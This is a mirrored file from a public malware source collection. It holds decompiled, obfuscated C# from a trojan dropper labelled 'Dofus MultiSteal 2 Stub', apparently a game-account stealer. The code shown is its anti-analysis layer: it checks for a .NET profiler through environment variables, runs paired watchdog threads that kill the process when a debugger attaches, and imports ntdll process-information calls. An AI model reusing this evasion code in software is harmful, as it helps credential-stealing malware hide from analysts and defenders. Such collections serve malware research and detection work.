mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
78 lines
2.7 KiB
C#
78 lines
2.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: ⟛礡✩ꏯ隨䫖<E99AA8>킎
|
|||
|
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
internal static class \u27DB礡\u2729ꏯ隨䫖\uFFFD킎
|
|||
|
{
|
|||
|
[DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
|||
|
private static extern int 鸬闰\uEB56㵐놽\uF06A墾㐠(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
byte[] ProcessInformation,
|
|||
|
uint ProcessInformationLength,
|
|||
|
out int ReturnLength);
|
|||
|
|
|||
|
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
|||
|
private static extern uint 碾왊溈莝舡䎸껈홫(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
byte[] ProcessInformation,
|
|||
|
uint ProcessInformationLength);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
|
|||
|
private static extern bool ꭍ㙸ሕ\u2E96\uFFFD\u0AF6繥߮(IntPtr hObject);
|
|||
|
|
|||
|
public static void 膒\uF296\u2595ꗫ燞\uFFDDﹱ蔙()
|
|||
|
{
|
|||
|
switch (Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING"))
|
|||
|
{
|
|||
|
case null:
|
|||
|
switch (Environment.GetEnvironmentVariable("COR_PROFILER"))
|
|||
|
{
|
|||
|
case null:
|
|||
|
break;
|
|||
|
default:
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
break;
|
|||
|
default:
|
|||
|
label_1:
|
|||
|
Environment.FailFast("Profiler detected");
|
|||
|
break;
|
|||
|
}
|
|||
|
Thread parameter1 = new Thread(new ParameterizedThreadStart(\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.䪕햰㯴濈ⷁ졥蜞洊));
|
|||
|
Thread parameter2 = new Thread(new ParameterizedThreadStart(\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.䪕햰㯴濈ⷁ졥蜞洊));
|
|||
|
parameter1.IsBackground = true;
|
|||
|
parameter2.IsBackground = true;
|
|||
|
parameter1.Start((object) parameter2);
|
|||
|
Thread.Sleep(500);
|
|||
|
parameter2.Start((object) parameter1);
|
|||
|
}
|
|||
|
|
|||
|
private static void 䪕햰㯴濈ⷁ졥蜞洊(object thread)
|
|||
|
{
|
|||
|
Thread.Sleep(1000);
|
|||
|
Thread thread1 = (Thread) thread;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
if (Debugger.IsAttached || Debugger.IsLogging())
|
|||
|
goto label_5;
|
|||
|
label_1:
|
|||
|
if (!thread1.IsAlive)
|
|||
|
Environment.FailFast("Loop broken");
|
|||
|
Thread.Sleep(1000);
|
|||
|
continue;
|
|||
|
label_5:
|
|||
|
Environment.FailFast("Debugger detected (Managed)");
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|